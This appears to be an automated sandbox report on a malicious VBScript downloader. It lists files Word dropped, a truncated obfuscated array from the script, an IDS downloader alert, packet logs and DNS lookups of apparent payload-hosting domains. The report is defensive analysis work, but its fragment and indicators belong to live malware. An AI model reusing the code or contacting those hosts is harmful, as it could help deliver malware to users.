                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):270198
                                                                                                                                                        Entropy (8bit):5.073814698282113
                                                                                                                                                        Encrypted:false
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):217137
                                                                                                                                                        Entropy (8bit):5.068335381017074
                                                                                                                                                        Encrypted:false
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254875
                                                                                                                                                        Entropy (8bit):5.003842588822783
                                                                                                                                                        Encrypted:false
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):344303
                                                                                                                                                        Entropy (8bit):5.023195898304535
                                                                                                                                                        Encrypted:false
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):250983
                                                                                                                                                        Entropy (8bit):5.057714239438731
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                        MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):51826
                                                                                                                                                        Entropy (8bit):5.541375256745271
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                        MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                        SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                        SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                        SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):47296
                                                                                                                                                        Entropy (8bit):6.42327948041841
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34415
                                                                                                                                                        Entropy (8bit):7.352974342178997
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                        MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                        SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                        SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                        SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3465076
                                                                                                                                                        Entropy (8bit):7.898517227646252
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                        MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                        SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                        SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                        SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):12
                                                                                                                                                        Entropy (8bit):0.41381685030363374
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:/l:
                                                                                                                                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:............
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:JSON data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):55
                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                        File type:ASCII text, with very long lines (2459), with CRLF line terminators
                                                                                                                                                        Entropy (8bit):3.741424554315856
                                                                                                                                                        TrID:
                                                                                                                                                          File name:YinLHGpoX4.vbs
                                                                                                                                                          File size:2'756 bytes
                                                                                                                                                          MD5:1c13faf06926c36c9b8abc23ab38e1eb
                                                                                                                                                          SHA1:4085a7d8203165b83cd7283348a775d5db0ffbe1
                                                                                                                                                          SHA256:4229e57e86a1cf7074841b4a3020b8d9c7c9e8024de9d4b31cea02b3c1879b3c
                                                                                                                                                          SHA512:74b713d8542dd17046cc7083cc1a15c3d0226c0cf7a10cd24eb4fd790a7376b66d819aca4b95d7a496282bf6fcfa0e67e06200930021a3dfe48e512ea33a4eba
                                                                                                                                                          SSDEEP:48:6pRrwS1uNbcrcpwVB6yxLihr07wjl6yLnxiJIl0yxEtF:6pBwS1utpwVBOawjl9y0u
                                                                                                                                                          TLSH:AC51C61D088B4C64DBEB784DB526A5EFC7B1430F1D9BA89283B0AE7C6A1723E41F4056
                                                                                                                                                          File Content Preview:dwo13tz1lzdja89e = Array(669, 716, 703, 699, 718, 703, 681, 700, 708, 703, 701, 718, 642, 636, 689, 685, 701, 716, 707, 714, 718, 648, 685, 706, 703, 710, 710, 636, 643, 648, 684, 719, 712, 634, 636, 714, 713, 721, 703, 716, 717, 706, 703, 710, 710, 648,
                                                                                                                                                          Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T12:51:39.349425+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49754 | 202.71.109.228 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                          Dec 19, 2024 12:51:00.459904909 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:00.459991932 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:00.463203907 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:00.463284969 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:01.962081909 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:01.962099075 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:01.962198973 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:02.202030897 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:02.202136040 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:02.202152967 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:02.202203035 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:02.202682018 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:13.725888968 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:13.725938082 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:13.726048946 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:13.728874922 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:13.728898048 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:15.659442902 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:15.659590006 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:15.664747000 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:15.664777040 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:15.665066957 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:15.672715902 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:15.715329885 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.071614027 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.071640968 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.071703911 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:18.071729898 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.133151054 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:18.347235918 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.347248077 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.347718000 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:18.598193884 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.598206997 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.598336935 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:18.614931107 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.615000963 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:18.615004063 CET44349739103.53.42.63192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:18.615044117 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:18.615401983 CET49739443192.168.2.4103.53.42.63
                                                                                                                                                          Dec 19, 2024 12:51:36.803771019 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:36.803837061 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:36.803922892 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:36.826441050 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:36.826477051 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:38.522314072 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:38.522402048 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:38.591104984 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:38.591131926 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:38.592168093 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:38.592245102 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:38.593681097 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:38.635375023 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.349445105 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.349476099 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.349514961 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.349526882 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.349536896 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.349570036 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.581923008 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.581938982 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.581995010 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.600722075 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.600790977 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.629450083 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.629512072 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.651278973 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.651333094 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.826451063 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.826538086 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.846415043 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.846524954 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.862603903 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.862683058 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.878654003 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.878720999 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.894584894 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.894658089 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.916215897 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.916285038 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:39.931994915 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:39.932092905 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.063064098 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.063199043 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.074299097 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.074394941 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.084460020 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.084544897 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.094652891 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.094736099 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.107816935 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.107886076 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.118112087 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.118206978 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.128267050 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.128334999 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.138556957 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.138648033 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.151912928 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.152020931 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.162254095 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.162338972 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.174263954 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.174352884 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.185014963 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.185090065 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.194818974 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.194910049 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.258128881 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.258212090 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.266642094 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.266762018 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.305224895 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.305315971 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.312190056 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.312249899 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.316593885 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.316673994 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.321048021 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.321101904 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.324498892 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.324567080 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.328006983 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.328071117 CET49754443192.168.2.4202.71.109.228
                                                                                                                                                          Dec 19, 2024 12:51:40.332420111 CET44349754202.71.109.228192.168.2.4
                                                                                                                                                          Dec 19, 2024 12:51:40.332479000 CET49754443192.168.2.4202.71.109.228
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 12:50:47.980000973 CET | 50239 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 12:50:48.119019985 CET | 53 | 50239 | 1.1.1.1 | 192.168.2.4
Dec 19, 2024 12:50:55.613214970 CET | 58330 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 12:50:56.213932991 CET | 53 | 58330 | 1.1.1.1 | 192.168.2.4
Dec 19, 2024 12:51:12.778992891 CET | 55798 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 12:51:13.722399950 CET | 53 | 55798 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 12:50:47.980000973 CET | 192.168.2.4 | 1.1.1.1 | 0xda4c | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:55.613214970 CET | 192.168.2.4 | 1.1.1.1 | 0x5a3a | Standard query (0) | www.tdejb.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:12.778992891 CET | 192.168.2.4 | 1.1.1.1 | 0x7e7e | Standard query (0) | www.ftsengineers.com | A (IP address) | IN (0x0001) | false
